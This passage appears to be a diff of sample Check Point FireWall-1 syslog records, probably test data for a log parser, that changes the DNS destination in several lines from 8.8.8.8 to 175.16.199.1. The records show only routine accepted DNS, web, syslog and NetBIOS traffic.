FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T23:17:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c83,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523843"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47700"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:17:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c83,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523843"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58686"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:17:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c83,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523843"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47700"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:17:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c83,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523843"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58686"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:17:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c8a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52353"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:17:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c8a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52354"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:17:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c8a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52355"; service:"443"; service_id:"https"; 
src:"192.168.1.117"] <134>1 2020-03-29T23:17:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c8a,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52356"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T23:17:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c8d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523853"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:17:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c8d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523853"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47518"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:17:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c97,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523863"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51089"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:17:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c97,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523863"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39925"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:17:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c8d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523853"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:17:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c8d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523853"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47518"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:17:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c97,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523863"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51089"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:17:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c97,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523863"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39925"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48993"; service:"53"; service_id:"domain-udp"; 
src:"192.168.1.100"] <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45830"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10855"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48270"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48770"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10856"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42559"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41072"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10857"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ca1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523873"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47854"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:17:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ca1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523873"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47854"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:17:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; 
ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T23:18:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ca9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.117"] -<134>1 2020-03-29T23:18:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cab,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523883"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40830"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:18:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cb5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523893"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53107"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:18:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cbf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523903"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:18:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; 
